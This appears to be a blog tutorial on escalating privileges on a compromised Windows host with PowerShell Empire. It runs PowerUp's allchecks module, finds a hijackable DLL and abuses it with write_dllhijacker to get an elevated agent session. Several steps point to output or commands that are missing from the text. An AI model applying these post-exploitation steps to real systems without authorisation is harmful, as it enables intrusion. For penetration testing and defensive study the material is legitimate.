So in one way or another, you’ve got your shell on the victim machine. Well done. After doing a quick ‘sysinfo’ you notice that you’re not the administrator user, hence the modules you can use are limited to basic operations. To get access to the sensitive data and operations, you must escalate your privileges to an administrator account. But how do you do it?
PowerShell Empire is here to help you. It offers a wide range of privilege escalation modules, ranging from mimikatz to PowerUp, allowing you to escalate privileges even on systems containing the newest patches. It also includes modules such as sherlock, that are based on exploiting unpatched Windows operating systems.
In this article, we will assume that you already have a working non-administrator account PowerShell Empire shell on the victim machine (you can see how you can get the shell on our previous article).
Okay, enough theory, let’s get it started. Interact with your existing agent:
interact <agent name>
For this article we will be using the PowerUp module, which has the biggest success rate of all privilege escalation modules in PowerShell Empire.
You will see something like this:
The result we have got is a list of PowerShell Empire’s PowerUp privilege escalation modules. The last one, named ‘allchecks’, might catch your sight – and it should. This module performs all privilege escalation checks on the target machine. Let’s use this one:
Let’s check if it requires any additional configurations:
Perfect! So as we can see, the module is ready to use as is. Let’s run it:
When done, you will see the results of a large amount of PowerUp checks done:
As we can see, we have a potentially hijackable DLL (which is the most common case in our experience).
Now, how de we exploit it? The answer is very easy. For each potential AbuseFunction, there is a seperate PowerShell Empire privilege escalation module. Let’s find the one we need by using the keyword DLL:
As we can see, one of the results is write_dllhijacker. Sounds just like what we need. Let’s use it:
Let’s see what options are required to run this module:
As we do see, we need to set the DllPath (AbuseFunction already supplied it to us), the Listener (in your case it will probably be ‘http’) and then we can run the module. Let’s set these settings and run it.
set DllPath <your DLL path>
set Listener http
And thats it! You have a new PowerShell Empire session running in elevated context! If you found that useful, please leave a comment or consider sharing this post. Good luck and happy hacking!